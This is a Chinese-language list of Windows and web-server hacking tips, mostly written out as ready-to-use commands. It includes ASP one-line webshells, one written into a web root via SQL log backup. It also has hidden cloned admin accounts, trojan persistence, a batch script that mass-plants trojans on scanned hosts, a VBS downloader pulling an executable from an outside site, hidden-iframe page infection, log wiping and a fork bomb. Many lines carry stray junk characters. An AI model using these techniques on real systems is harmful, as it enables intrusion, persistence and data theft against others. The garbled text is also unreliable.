1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
; P$ r+ F A) b: f+ ^8 x4 Z3 zcacls C:\windows\system32 /G hqw20:R
& x0 ?; h- z. k# }思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
9 v" U! j4 C; h7 i8 N恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F5 [; C) b+ \, H1 D, E8 y Q
* y) Y D* E6 ?4 D8 T* Z5 _- ?
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。" h) L" J; m B
7 p# Y9 S, g4 U" l4 b9 a* T3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。/ n* y" ]& ~5 u8 W
5 i7 L% r% v* l% }" Y5 `& N4 q8 V5 C/ g4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
' u2 H' ]' n7 W! N) m0 J
d6 C4 v X: K$ A6 B5、利用INF文件来修改注册表
. S: K; z8 m) D# Q) l- m* F: M[Version]/ T: j4 C2 v6 Z& n8 e
Signature="$CHICAGO$"7 X! `2 n$ k. k! O4 r
[Defaultinstall]6 N: I) {7 @; z: `, j& r/ i. M
addREG=Ating1 H4 r3 w3 n- N8 D; \: v' f7 ]$ G; f
[Ating]
Z! ^8 p+ `2 Z/ W2 ]9 b' w* IHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"; \1 J* c M9 V7 Z) s) n; I3 a
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:- g8 }8 }% o0 \" r" u+ [8 \
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径! t2 v9 }8 r/ i5 S8 U& O6 @
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
4 k" Y6 W% |7 s' t: THKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
2 f e3 Y/ ~* w0 _0 x6 E( V; sHKEY_CURRENT_CONFIG 简写为 HKCC
* f+ H7 B9 k5 p d/ P9 G. n0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值/ m. \" A1 G# {. Q1 V
"1"这里代表是写入或删除注册表键值中的具体数据
; T" g% u1 }) n4 x' J
0 ?' s. |' ~. u. A6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,# b B3 p1 L& z1 P: S* S
多了一步就是在防火墙里添加个端口,然后导出其键值# [' Z2 r7 `& D2 {* [6 K
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]. k- Z; ~3 W' L, T$ m
4 V; a) g# n w) M$ `7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
2 l5 y. `" F" Q8 g/ ^在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。2 t: Q5 c# B! F
; V( X( d( b6 d8 F8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。$ r; B l7 {5 c6 H* U! b) m
" T( s* W. D9 y, }. ]
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
8 f3 {' O" E* z9 G5 P6 `可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
. U( q5 b% y0 h) }: {$ `# @: g5 }% s# ~1 @
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”3 B* _6 r( `) e) S0 ` _' h
) E7 Z9 x; G$ b5 M+ E! X: ?
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,! X2 s" Q. p; ]$ I9 F# d
用法:xsniff –pass –hide –log pass.txt$ R" D! F$ y! b m: X9 c5 R
9 d" [8 I1 g6 L0 G* t12、google搜索的艺术
: r9 w# j' g. ]- p9 @搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
8 S c9 t3 a' ]0 K* y/ f* B1 P9 g* w或“字符串的语法错误”可以找到很多sql注入漏洞。% o o9 m1 }9 l5 K
9 Q6 h/ C" Z) y2 D1 h- j13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
5 D: I# L A* B" i# s* P, t. O0 A2 `4 E
14、cmd中输入 nc –vv –l –p 1987# T! p7 V* d U' w0 K
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
. T; F3 g E/ P$ r/ M& {5 a4 q8 ]; M, U v" P: S8 G
15、制作T++木马,先写个ating.hta文件,内容为
+ s# a& Z4 K9 F<script language="VBScript">
5 ?# L+ X' t8 s4 h* C! s$ }5 Pset wshshell=createobject ("wscript.shell" )/ |0 _" b) R! S) P8 ]
a=wshshell.run("你马的名称",1)! V5 p# L( {9 p* G0 @& l, u0 J
window.close1 H9 ?: h7 r7 f. d" V2 p
</script>
5 o6 H7 l8 n+ B2 o8 m再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
- ~* @ C! v/ u C$ M B [ Y0 n {7 C: E: ]8 E4 E) M* W
16、搜索栏里输入% s6 {7 i6 f ]- ~8 N# A& ~
关键字%'and 1=1 and '%'='5 I! ?! l( K8 j) m* o
关键字%'and 1=2 and '%'='
' j- r* z6 D6 N" z比较不同处 可以作为注入的特征字符
+ B/ `* d0 m! X
5 ?5 _7 [" G, F0 |' d; x& @17、挂马代码<html>6 y# T$ F! \) _: f# D& H- c
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>& ]6 S; u1 E. e Q/ |
</html>
, h R1 s# N+ n- k
7 A2 ] s% k( _( ^! p0 ~18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,3 c0 s7 J/ C) U! W$ |
net localgroup administrators还是可以看出Guest是管理员来。
7 S& E$ K- f2 E4 G9 s' u8 v; O/ W2 E
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
" _$ Y7 M* j# {3 |用法: 安装: instsrv.exe 服务名称 路径
3 ^8 B. Z+ `& W$ ^卸载: instsrv.exe 服务名称 REMOVE
% d4 ~$ C. u% t c7 ^/ B5 ^: B1 Z8 y) A
8 \: O! A4 |) R6 q21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉. d0 w U' K9 W! {7 U: t* ?( i
不能注入时要第一时间想到%5c暴库。
0 v) r5 L" h; A0 d* C7 W
; f- A& c/ `$ K# S _8 Z22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~8 s5 J q* M2 v; s* W
6 O% S# F# H5 G- y7 v
23、缺少xp_cmdshell时
8 Y, P0 ~. H6 V: Y Z/ ^7 [ \$ s尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'' Q( p: q6 l6 K) V2 Y
假如恢复不成功,可以尝试直接加用户(针对开3389的)
0 V/ q! Y+ K9 Z6 Ideclare @o int
6 c; P' f$ i" E- w! b2 m: iexec sp_oacreate 'wscript.shell',@o out7 H) ~' G; ]0 }% l% B
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
8 p" I3 X/ ^7 |9 Z
- ?& m; | [* ~2 s; D9 c24.批量种植木马.bat* P2 q2 ?" V Y8 E* E
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
9 e5 J% F4 j2 k: D+ W# N( Sfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
' i- ]) w- k3 ~6 D) X% D3 ]& W扫描地址.txt里每个主机名一行 用\\开头
! E' Q+ H, f" J8 G$ ~- `( q! ]4 X; X& V' J- X0 M
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
8 p8 f! d1 T! F, c h! G6 A: A7 S3 j2 O
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.( Y$ r" I; Z4 W# x6 M% g) ?6 ?
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
% ]* L4 i% J" ~.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
& R8 q, c( J* y& D, Q [) V' G2 r. m8 R7 m8 ~ M6 U5 L. ~# B
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP& ?; ]$ s; z/ Q( M& d3 `
然后用#clear logg和#clear line vty *删除日志! V0 @1 X) m" [$ r1 e2 y1 J
# v( S; y8 I, M3 i. A; o28、电脑坏了省去重新安装系统的方法
- u% ^8 P$ N; L: C& x纯dos下执行,9 T, r0 {) r4 s6 F
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config* N% T) @4 g2 V# B" \+ N
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config( H/ C) G6 c& g
, @% x( C n. z% Q( u& x, c, z
29、解决TCP/IP筛选 在注册表里有三处,分别是:
5 m5 L7 G1 {8 [ ?0 v7 p8 pHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
. p( |" X; D* S. G, Q/ L( x2 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
- q. \( Q, {2 [8 U% R% V/ ~" W8 HHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' ?. g l6 p6 d$ d2 h$ j, X% B分别用
/ }) |: E7 W1 B, f' m: _2 zregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. k) I" A$ D/ n+ t7 ^% D ^. Mregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
6 d. v# E1 Z: }+ eregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip8 c. W5 k/ l# `% @
命令来导出注册表项
, O% ]3 @- Z, l' K9 u然后把三个文件里的EnableSecurityFilters"=dword:00000001,
3 w$ y, B, L7 Q- @$ C. o改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用: h4 F6 X$ h, D* c
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
- @. B" t7 v, ~) o5 ?; {* B
7 |& N9 a- A* p$ E30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
. T6 D% H8 P" J6 S: |9 O' }) i- LSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
, h; T0 s, C, b; z v" V& z
" h$ K% o M4 ]- i1 y5 V9 X! `31、全手工打造开3389工具4 y6 K, m" ~5 T' J* i! l
打开记事本,编辑内容如下:1 S! y2 |7 Z! c- e, U) Q& N# s1 A
echo [Components] > c:\sql
0 S6 C, ~! T9 z. S1 U+ H. Techo TSEnable = on >> c:\sql9 y3 b8 j+ J# m. p$ z
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
! i: t ^) o+ r$ u2 u编辑好后存为BAT文件,上传至肉鸡,执行2 e& E. P& I% K3 W1 H5 R- s- l
$ _$ {0 D2 j- W1 _. W( R m6 `+ @
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马! C9 G; s4 L7 f. s+ e7 h- ]. u0 f; A
$ n+ }1 Q/ U0 m5 Y33、让服务器重启
. E( p8 \$ l/ h) m8 N写个bat死循环:
# V8 v% h7 U: x6 B: J6 m@echo off' O; L1 L4 v& Q( c) g& D' J# A
:loop1
# w8 I+ ^! z" Xcls; v: Q0 }8 n( O7 [# P5 V+ D" x2 V2 ]
start cmd.exe
, {* @7 q4 Z6 W9 S$ O& t" Lgoto loop1, x& u" B* k% c5 X$ I
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
/ l3 P- U, k; y0 X" b
0 S( E% \4 [! X, O% Z V34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
3 n" f/ y% `6 a8 V$ V* i@echo off
- W& E$ x& x% _. j& p: H5 @; O- ydate /t >c:/3389.txt( @6 M" @+ [+ o. ~# C
time /t >>c:/3389.txt% k h7 h9 {! u* C. l
attrib +s +h c:/3389.bat2 Z5 A, S/ S; Z' g. |$ q j4 }, M) k
attrib +s +h c:/3389.txt
B! V, ~- X+ b1 L) w% G4 onetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
y. w4 ?, L0 H8 N( T- g$ j并保存为3389.bat
: l9 t: r# t; L打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
/ Q9 e9 _1 U- d% d9 x) {( m, R* g( h
35、有时候提不了权限的话,试试这个命令,在命令行里输入:1 Y# l1 B( a# C
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)4 U- K! M) l+ c8 X
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
* X& g1 t+ k) h$ {" m$ P" x9 P% Q$ j" F4 `5 c
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件" g) e6 J2 ]. |# v" G( L4 g# _
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址( P+ A$ N) J' M& x
echo 你的FTP账号 >>c:\1.bat //输入账号
# a! Q4 o, e4 S, a5 Z! q) yecho 你的FTP密码 >>c:\1.bat //输入密码
9 ~# ~0 t6 r$ w. _, Q! k( Oecho bin >>c:\1.bat //登入
' ~8 G" L* ~5 j) [% F/ Z6 a; Qecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么" n' n1 y. R8 h! Q1 F+ h. g( f
echo bye >>c:\1.bat //退出: ]! w* I1 l3 d+ ^; l! \4 A9 F
然后执行ftp -s:c:\1.bat即可
. j6 g6 N9 @% i! L/ T4 M
. S7 ~& l6 w& |& \9 _& F37、修改注册表开3389两法& T" c) ]' b6 h9 A) d
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表; q' y: }( E {& R5 f- D# w1 z% u
echo Windows Registry Editor Version 5.00 >>3389.reg
7 \- S* g. Y% L2 F$ [. ?# c3 {# \echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
& o4 M M: _$ ~1 T, b! W& Y% Decho "Enabled"="0" >>3389.reg
# X1 \! g& J4 ]& R: cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows9 c- P* e$ Y3 B$ ?4 x% f
NT\CurrentVersion\Winlogon] >>3389.reg
( K' r; c" n, k/ Becho "ShutdownWithoutLogon"="0" >>3389.reg
! `1 @ G F; u" oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]9 \( B3 X2 `5 L' L4 a
>>3389.reg I& p& p7 B; N1 t' a
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
( h5 j, y, H! q1 v9 Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]2 D& ?8 [& e$ W0 C
>>3389.reg$ z2 y5 G' F: V
echo "TSEnabled"=dword:00000001 >>3389.reg
7 S( x6 d* X8 A: O5 X+ I# b+ Decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg$ ^& F1 L7 r/ k# O& f& t
echo "Start"=dword:00000002 >>3389.reg
4 s% d' k5 J: B) oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
7 ^. H [, p. P2 T2 P. J>>3389.reg
7 e1 P$ T: a5 z, Oecho "Start"=dword:00000002 >>3389.reg
3 K J0 k U& T# w1 cecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg8 G. N- k9 d: j$ ~
echo "Hotkey"="1" >>3389.reg' ]% }; L4 N. |2 r; M3 C$ I7 C1 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; [' A# e: R+ b) aServer\Wds\rdpwd\Tds\tcp] >>3389.reg
S% s( I+ @. S M* a; hecho "PortNumber"=dword:00000D3D >>3389.reg; w9 A# _' \% {' Z- @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 Z0 r9 W$ T; ]5 VServer\WinStations\RDP-Tcp] >>3389.reg. u, D3 `0 q3 @- `
echo "PortNumber"=dword:00000D3D >>3389.reg# @ O. B7 K: O& {, X% P5 k
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。* Y% }! D) d0 J3 m
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)! v+ P, ?0 ~# o) `
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效8 E2 m$ O/ K" H9 A/ E
(2)winxp和win2003终端开启" Q% x$ |' S. w) h$ ^( T
用以下ECHO代码写一个REG文件:8 A- T/ @9 p3 c$ R" ?8 b! u, |
echo Windows Registry Editor Version 5.00>>3389.reg
F. T& z3 X9 [: Q3 ^ L/ d5 P; Gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
0 h: e0 ~# p, ?/ g7 DServer]>>3389.reg
3 Q1 s, ^4 E$ c) _, recho "fDenyTSConnections"=dword:00000000>>3389.reg$ M; \4 F7 T8 z! l* O: d3 F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal _/ Z8 a. }' q3 |
Server\Wds\rdpwd\Tds\tcp]>>3389.reg, |6 j/ F: E! U L3 S; O
echo "PortNumber"=dword:00000d3d>>3389.reg- o- F9 P0 R+ h( p7 p
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 J( o* q6 \$ N! M( }# x3 P/ [
Server\WinStations\RDP-Tcp]>>3389.reg4 N( d3 Q# E H: U! g# u, |- U
echo "PortNumber"=dword:00000d3d>>3389.reg
7 |7 t% d9 f2 L然后regedit /s 3389.reg del 3389.reg
; ^( \. H" G0 c2 P5 Q6 {: f5 i* mXP下不论开终端还是改终端端口都不需重启% P3 i. \( F; S, m9 _5 g, Q
6 z7 |9 V q, u* H: J
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃( k% q7 w5 g5 m& r: _0 Q1 e
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
$ Z; l# O7 A$ I+ o
1 U$ d( w& D/ t1 O! t39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!4 k* a+ t! H ]9 K3 Z( x
(1)数据库文件名应复杂并要有特殊字符
9 e; Q" A( C1 ?$ v* D2 B( j- K(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
" v- }- h/ W' X6 U2 m7 h将conn.asp文档中的( J/ d% k# O7 F- r7 u# m
DBPath = Server.MapPath("数据库.mdb")
* v) h# N& }2 }0 _3 q" fconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
6 W! v- t/ x& ^& g( Z& A4 q+ D4 f4 u# A
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置# c! B+ `8 v" z: P* G
(3)不放在WEB目录里
# Z- \# B) r5 O& [" }; L; D9 O" T$ |' E n2 g; l' k
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉+ a, ?( ], _8 S
可以写两个bat文件( a' m7 \: u4 ?" Y- D4 c
@echo off) O0 { W1 ^2 t1 c
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
: |' }# ^1 T5 } y% z@del c:\winnt\system32\query.exe
0 @7 D9 _ [3 [0 K t% q9 p7 g5 f@del %SYSTEMROOT%\system32\dllcache\query.exe2 s3 q; s2 v9 c- y) a9 g1 P$ `
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
% A" C5 |( ~; z1 B( F$ d) j6 d% v4 M5 w3 }" f6 G6 t) Y
@echo off
& ~" J* T$ S. p# l@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe; Y5 A5 r" g3 _5 L
@del c:\winnt\system32\tsadmin.exe
3 i8 Z4 I3 ]( D! h2 X4 z2 G0 a@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex( T6 A" @3 R H9 V+ v9 a, D% ?9 G/ U4 L
0 {, h' l2 `( [2 R. n5 C41、映射对方盘符1 t. o9 g0 J' r* c, L
telnet到他的机器上," p! E8 z7 H0 t( _5 E" q
net share 查看有没有默认共享 如果没有,那么就接着运行
3 Y; r {! r. i! n8 A/ p; Cnet share c$=c:; t. }( H& ~. v) e- u* G4 Z
net share现在有c$
/ q; G3 g: C s; z* [9 T在自己的机器上运行% h) G$ P! ]9 ?4 ]9 X7 a8 f! \+ @) K
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K' B1 l. ~5 ^# v& P, f' l2 x
% D' a" D# Q. ?42、一些很有用的老知识
* }( R( z6 E9 N/ J" T$ l" R# h$ a& Z etype c:\boot.ini ( 查看系统版本 )% D! I1 F/ Z- Z5 U. _: f
net start (查看已经启动的服务)
( F& v) D( Y* o* {query user ( 查看当前终端连接 )% N/ v9 U: i' ?3 R
net user ( 查看当前用户 )
0 U8 l* _; [. S6 Lnet user 用户 密码/add ( 建立账号 )
- n; Y2 g" l6 b3 R+ Y: C. @. m+ B7 lnet localgroup administrators 用户 /add (提升某用户为管理员)0 E- |# p7 q7 H: o& |
ipconfig -all ( 查看IP什么的 )
I+ q4 @2 k- ?9 Vnetstat -an ( 查看当前网络状态 )
" i* H6 X& I. U$ {3 u1 I0 R/ H' Pfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
4 o# m: b1 B) i! b" [克隆时Administrator对应1F4
/ c8 l/ t* u5 e) E( Z# Z0 Dguest对应1F57 [' v# @, k3 C A
tsinternetuser对应3E8$ l% N U+ Z% u
! K6 Z H6 U' a& r
43、如果对方没开3389,但是装了Remote Administrator Service# V0 f; f3 f1 J- o2 x) W; P, i8 h
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
- `+ @4 S/ g# G" h1 l( T2 l! j0 y解释:用serv-u漏洞导入自己配制好的radmin的注册表信息( s. Q2 p8 h/ n4 C7 f
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
1 n$ K! i/ M9 p8 a; L# O5 N' U& E. u' s" S+ K& f/ @5 Q
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
- k7 q4 J. L5 \5 p v. x3 k本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
4 p* S- z' ~! f' {* o' C+ ]# J$ _. ^9 Q: v. v1 X
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)! u- \0 m7 l" A& Z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
( x3 P2 o( x2 \% W2 \7 M^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =* I# }1 Z" \3 |& m4 J
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
1 J- n3 O* g. Q |+ d/ d" q. o1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs& G4 K8 y$ J3 a6 I* [
(这是完整的一句话,其中没有换行符)
' w) L$ N4 e9 e然后下载:: Y4 y4 r! F6 Z5 V* c
cscript down.vbs http://www.hack520.org/hack.exe hack.exe3 H7 |1 r2 Y5 Y' D) f
2 S- t9 G$ N! G7 s6 D3 x# ^
46、一句话木马成功依赖于两个条件:
1 h3 X" _) G8 [& |4 \: Q! B1、服务端没有禁止adodb.Stream或FSO组件
+ Z1 |3 ]# |& @! @1 i0 Y0 x2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。) ?5 _$ C0 ^0 ~3 |$ Q! E8 u
9 Q1 U' H" b7 R2 \, c) C- l. A
47、利用DB_OWNER权限进行手工备份一句话木马的代码:& s! q8 E) y3 X9 L- g
;alter database utsz set RECOVERY FULL--8 h6 D8 _6 r: l3 o
;create table cmd (a image)--
9 z# U/ \5 b v$ D;backup log utsz to disk = 'D:\cmd' with init--5 ~% x i$ q8 r' ]7 p
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- B4 l) R+ \: v* j, d& a8 d' U
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
/ U( V# H; f, @3 h- W( P注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
- M0 L0 r# {# v6 v( d9 Q* M O. H8 G1 W7 U
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:. K) f0 t/ w1 t8 _% S3 p
: c; i* f9 _; r) t+ f用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
7 z# M4 ^4 T2 e) `5 E所有会话用 'all'。* Q1 p+ O6 O# {
-s sessionid 列出会话的信息。) A7 Q% q: z$ N6 G( f" \1 L
-k sessionid 终止会话。! N( g* [+ t' `
-m sessionid 发送消息到会话。
$ M7 M' e8 k" D7 A' j! W9 P8 s
/ c3 R3 J5 ?* B5 K. Yconfig 配置 telnet 服务器参数。2 Z7 t' F& I6 K1 x- d
* i. N3 k& a! k# J! Y( ncommon_options 为:
& q- Z& j5 I; l5 Q8 D3 Q-u user 指定要使用其凭据的用户: }& T, y9 m6 ? y
-p password 用户密码
' ^7 V' i- _) s9 w' b, P0 `
* X, V8 W( c( i1 |7 K# ]& r* Rconfig_options 为:: \( o1 i3 B0 G! y4 v5 `
dom = domain 设定用户的默认域
6 v8 c5 G0 l+ S% xctrlakeymap = yes|no 设定 ALT 键的映射& B% s) A; P: z) t
timeout = hh:mm:ss 设定空闲会话超时值$ l1 ^* {& u+ f. K& M5 D
timeoutactive = yes|no 启用空闲会话。
# Q5 Z- ]5 L; ]! _' ]. ~maxfail = attempts 设定断开前失败的登录企图数。 Y- @! {: Y) o7 @- L
maxconn = connections 设定最大连接数。7 H( o" @2 p: u* {5 M1 V
port = number 设定 telnet 端口。/ g$ e4 V8 n0 y V O
sec = [+/-]NTLM [+/-]passwd
2 W+ ^! z: w# p; l) m设定身份验证机构
- _, M7 h% U! v; ]fname = file 指定审计文件名。; T4 _7 p0 E- a& _7 V" n
fsize = size 指定审计文件的最大尺寸(MB)。
. T8 W! W: b v& e1 ^mode = console|stream 指定操作模式。 O, V! D/ L1 T( g% N
auditlocation = eventlog|file|both, @* @! B2 A6 M2 ^- o' S- Y
指定记录地点 }7 e* l: {. G. z9 k' x4 i0 Z
audit = [+/-]user [+/-]fail [+/-]admin( d' h+ p9 { N* G: ]
0 c) {! p( }4 N% ]6 P
49、例如:在IE上访问:& t j, O0 ~+ x8 F! f4 Z
www.hack520.org/hack.txt就会跳转到http://www.hack520.org// w) ?# }3 V2 k" s8 |& q
hack.txt里面的代码是:
( P3 ]1 F8 A1 o' f<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">6 x7 E9 C% Z6 G; S L
把这个hack.txt发到你空间就可以了!
$ C, f- m6 V2 q8 b# s0 V& r* N4 s. m这个可以利用来做网马哦!
5 _& f1 y( {& {% O( l B3 u: z1 C! J. j& M! ~; l; D
50、autorun的病毒可以通过手动限制!
9 x' R+ W, X9 v" d; k7 u- Q1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
; @ ?1 Z& x1 \& E- T( V2,打开盘符用右键打开!切忌双击盘符~' i0 \& `' ]0 |! `
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!6 L7 b" P. p8 f/ S
& J6 ^& r9 G# A
51、log备份时的一句话木马:
; t9 n8 l+ [3 r2 E4 ~7 z: Na).<%%25Execute(request("go"))%%25>
Y5 P( I- U& F/ k" |) Qb).<%Execute(request("go"))%>0 E: m( Q& H1 V8 f: Q# r3 n3 k
c).%><%execute request("go")%><%
6 @- Q: |0 _6 Yd).<script language=VBScript runat=server>execute request("sb")</Script>
) t2 b- ^9 Y! ]- ve).<%25Execute(request("l"))%25>: ?7 Y- F* @' @% c7 G& P
f).<%if request("cmd")<>"" then execute request("pass")%>
4 b" K. `* Y% @, Q! N% R/ v
+ N* {3 ^3 m. V2 q! s( D- e' {52、at "12:17" /interactive cmd
